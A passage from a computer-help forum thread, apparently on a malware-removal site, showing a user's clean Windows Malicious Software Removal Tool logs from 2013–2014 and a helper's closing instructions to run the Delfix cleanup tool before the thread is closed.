Engine: 1.1.10100.0
Signatures: 1.163.1013.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Dec 22 03:00:54 2013

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.8, January 2014 (build 5.8.9803.0)
Started On Mon Jan 20 23:16:55 2014

Engine: 1.1.10201.0
Signatures: 1.165.1273.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Jan 20 23:19:16 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.9, February 2014 (build 5.9.9902.0)
Started On Sat Mar 01 22:25:23 2014

Engine: 1.1.10201.0
Signatures: 1.165.3163.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Mar 01 22:28:37 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.10, March 2014 (build 5.10.10001.0)
Started On Tue Mar 11 20:20:25 2014

Engine: 1.1.10302.0
Signatures: 1.167.1001.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Mar 11 20:24:13 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.11, April 2014 (build 5.11.10100.0)
Started On Mon Apr 21 22:16:22 2014

Engine: 1.1.10401.0
Signatures: 1.169.1258.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon Apr 21 22:18:58 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.12, May 2014 (build 5.12.10200.0)
Started On Mon May 19 22:15:49 2014

Engine: 1.1.10502.0
Signatures: 1.173.1305.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Mon May 19 22:19:02 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.13, June 2014 (build 5.13.10300.0)
Started On Sat Jun 21 06:46:07 2014

Engine: 1.1.10600.0
Signatures: 1.175.1113.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Jun 21 06:50:18 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.14, July 2014 (build 5.14.10402.0)
Started On Sun Jul 13 01:22:59 2014

Engine: 1.1.10701.0
Signatures: 1.177.949.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sun Jul 13 01:26:03 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.15, August 2014 (build 5.15.10500.0)
Started On Sat Aug 16 10:39:49 2014

Engine: 1.1.10802.0
Signatures: 1.179.1796.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Sat Aug 16 10:42:30 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.16, September 2014 (build 5.16.10602.0)
Started On Tue Sep 16 22:27:56 2014

Engine: 1.1.10904.0
Signatures: 1.183.882.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Tue Sep 16 22:33:55 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Thu Oct 16 16:50:19 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Thu Oct 16 16:56:52 2014

Return code: 0 (0x0)

---------------------------------------------------------------------------------------
Microsoft Windows Malicious Software Removal Tool v5.17, October 2014 (build 5.17.10700.0)
Started On Wed Oct 29 19:29:49 2014

Engine: 1.1.11005.0
Signatures: 1.185.2035.0

Results Summary:
----------------
No infection found.
Microsoft Windows Malicious Software Removal Tool Finished On Wed Oct 29 19:35:48 2014

Return code: 0 (0x0)


Yes, logs are looking OK, you should be good to go.... One last tool to clean up..

Download "Delfix by Xplode" and save it to your desktop.

Or use the following if first link is down:

"Delfix link mirror"

Double-click to start the program. If you are using Vista or higher, please right-click and choose "Run as administrator".

Make sure the following items are checked:

    Activate UAC
    Remove disinfection tools
    Create registry backup
    Purge System Restore
    Reset system settings

Now click on "Run" and wait patiently until the tool has completed.

The tool will create a log when it has completed. We don't need you to post this.

Part of the routine will be to create a registry backup with ERUNT; the backup will be created here:

C:\Windows\ERUNT

When all is known to be well with your system you can delete that backup folder if you consider it as not needed...

Any remnant files/logs from tools we have used can be deleted…

Next,

Read the following link to fully understand PC security and best practices, you may find it useful....

http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/#entry2316629

Let me know if we can close out....

Thanks,

Kevin


  • Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!

This topic is now closed to further replies.